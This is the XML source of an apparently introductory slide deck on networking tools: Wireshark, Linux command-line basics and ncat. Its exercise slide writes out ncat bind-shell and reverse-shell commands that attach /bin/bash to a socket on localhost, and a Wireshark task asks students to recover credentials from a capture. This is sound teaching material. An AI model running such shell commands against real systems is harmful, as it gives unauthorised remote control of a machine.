          </a:p>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rIns="91425"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5" name="Shape 1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1" name="Shape 3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4" name="Shape 3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25"/>
            <a:ext cx="4572000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="dk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buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>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3" name="Shape 4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lt2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>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lt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Shape 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="744575"/>
            <a:ext cx="8520600" cy="2052600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Basic Networking Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2834125"/>
            <a:ext cx="8520600" cy="7926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Shape 60"/>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Topics Covered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Shape 61"/>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pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Linux Command Line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ncat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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Shape 66"/>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Wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 67"/>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pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GUI for network traffic analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Read pcap files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>View real-time network traffic on interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Inspect data at all layers of network stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Inspect application-layer payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And much more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68" name="Shape 68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4717269" y="2645650"/>
            <a:ext cx="4426724" cy="24978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 name="Shape 72"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 73"/>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Wireshark Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Shape 74"/>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pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Read http.pcap into wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Identify TCP setup + tear down (under Info column)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TCP setup: SYN/SYN+ACK/ACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TCP teardown: FIN/FIN+ACK/ACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What are the source and destination IP addresses involved?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Which one is the http server?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Which one is the client (web browser)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What are the source and destination ports involved?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What are the credentials that the client used to authenticate to the server?</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 name="Shape 78"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Shape 79"/>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Linux Command Line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Shape 80"/>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pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Command line vs. GUI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can be difficult to learn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Generally more productive in the long run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Script-friendly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>FS navigation: cd, ls, cat, mv, cp, rm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Text editors: nano, vi, emacs (not getting into vi vs. emacs today)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Compilers: gcc, g++, cc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Interpreters: python, perl, ruby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Text parsing: grep, cut, sort, uniq</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Networking: nc (more on this later), ssh, wget, curl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Miscellaneous: man</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sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Shape 85"/>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Pipes and redirects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Shape 86"/>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pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pipe: |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ cmd1 | cmd2 - output of cmd1 becomes input of cmd2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>e.g. $ ping -c 5 8.8.8.8 | grep "packet loss"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Redirect: &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ cmd &gt; outfile - send output of cmd to file outfile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>e.g. $ ping -c 5 8.8.8.8 &gt; ping.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Trivial examples, but these tools can simplify many admin tasks</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sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Shape 91"/>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Ncat Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Shape 92"/>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pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Three different versions: nc, netcat, ncat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Basic network socket receiver/sender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Raw interface to transport layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Useful for debugging network applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Available by default in most linux distributions</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Shape 97"/>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Ncat Usage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Shape 98"/>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pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Usage: ncat &lt;host&gt; &lt;port&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Useful command-line options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-v: verbose (information about connections)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-l: listen for incoming connections on port (do not specify host option)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-u: UDP mode (defaults to TCP otherwise)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-e &lt;program&gt;: execute a program when connection is established</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 name="Shape 102"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Shape 103"/>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Netcat Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Shape 104"/>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pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Simple client/server model:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Server-side: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cat -lvp 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Client-side: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cat -v 127.0.0.1 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Should be able to send/receive data on both ends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ncat bind shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cat -lvp 4444 -e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cat -v 127.0.0.1 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ncat reverse shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cat -lvp 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cat -v 127.0.0.1 4444 -e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>File transfers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cat -lvp 4444 &gt; testfile.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cat -v 127.0.0.1 4444 &lt; testfile.txt</a:t>
            </a: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dark-2">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